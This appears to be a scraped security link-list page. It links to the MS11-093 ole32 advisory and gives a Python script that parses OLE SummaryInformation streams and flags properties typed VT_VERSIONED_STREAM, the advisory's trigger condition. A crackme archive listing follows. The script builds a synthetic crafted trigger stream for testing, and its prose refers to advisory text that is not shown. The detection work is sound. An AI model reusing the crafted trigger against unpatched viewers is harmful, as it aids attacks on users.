http://technet.microsoft.com/en-us/security/bulletin/ms11-093

#######################################################################

Source: http://aluigi.org/adv/ole32_1-adv.txt
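The property-set layout the advisory walks through above (the 0xfffe byte-order mark, CLSID, FMTID, section offset, then a section carrying its size, property count and a table of PID/offset pairs) is enough to write a triage check for the condition it describes: a SummaryInformation property whose value is typed VT_VERSIONED_STREAM (0x49). The Python below is an added example, not Luigi Auriemma's proof-of-concept and not Microsoft code. It serialises two constructed streams in that layout, parses them back with bounds checks on every offset, and reports any property typed 0x49. The two sample streams and their values are synthetic; pulling the `\x05SummaryInformation` stream out of the compound file in the first place is assumed to be done separately (for instance with the olefile module) and is not shown.

```python
import struct
import uuid

# Constants from MS-OLEPS; the layout follows the header table in the
# advisory (byte-order mark, CLSID, FMTID, section offset, then a section
# of size/count followed by (PID, offset) pairs and the values).
SUMMARY_INFO_FMTID = uuid.UUID("F29F85E0-4FF9-1068-AB91-08002B27B3D9")

VT_CF = 0x11                 # clipboard data, the normal type of PIDSI_THUMBNAIL
VT_LPSTR = 0x1E              # ANSI string
VT_VERSIONED_STREAM = 0x49   # the type the advisory names as the trigger

PIDSI_TITLE = 0x02
PIDSI_AUTHOR = 0x04
PIDSI_THUMBNAIL = 0x11

HEADER_SIZE = 48             # first section starts here when one FMTID is present


def lpstr(text: bytes) -> bytes:
    """Encode a VT_LPSTR value: 4-byte length (incl. NUL), the bytes, pad to 4."""
    raw = text + b"\0"
    return struct.pack("<I", len(raw)) + raw + b"\0" * (-len(raw) % 4)


def build_property_set(props, fmtid=SUMMARY_INFO_FMTID) -> bytes:
    """Serialise [(pid, vt, value_bytes), ...] into a one-section property set stream."""
    table_size = 8 + 8 * len(props)           # size + count + (pid, offset) pairs
    entries, values = b"", b""
    for pid, vt, val in props:
        entries += struct.pack("<II", pid, table_size + len(values))  # offset is section-relative
        values += struct.pack("<I", vt) + val  # type word: 2 bytes type + 2 bytes padding
    section = struct.pack("<II", table_size + len(values), len(props)) + entries + values
    header = (struct.pack("<HHI", 0xFFFE, 0, 0x00020006)  # byte order, version, OS id
              + uuid.UUID(int=0).bytes                     # CLSID (zero for SummaryInformation)
              + struct.pack("<I", 1)                       # one property set
              + fmtid.bytes_le                             # FMTID in on-disk GUID byte order
              + struct.pack("<I", HEADER_SIZE))            # section offset from stream start
    return header + section


def parse_property_set(data: bytes):
    """Return [(fmtid, [(pid, vt), ...]), ...]; every offset is checked before use."""
    byte_order, _version, _os_id = struct.unpack_from("<HHI", data, 0)
    if byte_order != 0xFFFE:
        raise ValueError("not a property set stream")
    (n_sets,) = struct.unpack_from("<I", data, 24)
    sets, pos = [], 28
    for _ in range(n_sets):
        fmtid = uuid.UUID(bytes_le=data[pos:pos + 16])
        (sec_off,) = struct.unpack_from("<I", data, pos + 16)
        pos += 20
        size, n_props = struct.unpack_from("<II", data, sec_off)
        if sec_off + size > len(data):
            raise ValueError("section runs past end of stream")
        props = []
        for i in range(n_props):
            pid, off = struct.unpack_from("<II", data, sec_off + 8 + 8 * i)
            if off + 4 > size:
                raise ValueError(f"property {pid:#x} offset outside its section")
            (vt,) = struct.unpack_from("<I", data, sec_off + off)
            props.append((pid, vt & 0xFFFF))   # low 16 bits carry the VT type
        sets.append((fmtid, props))
    return sets


def find_suspicious(data: bytes):
    """List (fmtid, pid, vt) for every property whose type is VT_VERSIONED_STREAM."""
    return [(fmtid, pid, vt)
            for fmtid, props in parse_property_set(data)
            for pid, vt in props
            if vt == VT_VERSIONED_STREAM]


# Constructed sample streams, not taken from the advisory's PoC file.
BENIGN = build_property_set([
    (PIDSI_TITLE, VT_LPSTR, lpstr(b"quarterly report")),
    (PIDSI_THUMBNAIL, VT_CF, struct.pack("<II", 8, 0) + b"\0" * 8),
])
CRAFTED = build_property_set([
    (PIDSI_TITLE, VT_LPSTR, lpstr(b"quarterly report")),
    (PIDSI_THUMBNAIL, VT_VERSIONED_STREAM, struct.pack("<I", 0) + b"\0" * 4),
])

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, find_suspicious(blob))
```

The check keys on the type word alone, as the advisory does, so a hit means the stream carries the trigger type, not that a given viewer will reach the vulnerable path; treat it as a reason to pull the file for inspection. The bounds checks matter in their own right: a parser that trusts the section size or a property offset is the kind of code the advisory's PoC would walk straight through.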
  24. [h=1]Binary Auditor Crackmes/Reversemes[/h]

Item name:          Binary Auditor Crackmes/Reversemes
Rating:             5.0 (1 vote)
Author:             Dr. TS and REA
Home URL:           http://www.binary-auditing.com
Last updated:
Version (if appl.): 1.001
Direct D/L link:    Locally archived copy
Description:        The archive of the now defunct binary-auditor website. As far as I know, this is the most recently uploaded compilation. Included in the archive is the beginner guide.
Related URLs:       No related URLs have been submitted for this item yet

Source: Binary Auditor Crackmes/Reversemes - Collaborative RCE Knowledge Library

Download: http://www.woodmann.com/collaborative/knowledge/images/Bin_Binary_Auditor_Crackmes_Reversemes_2011-2-1_19.17_Binary_Auditor_Lessons.zip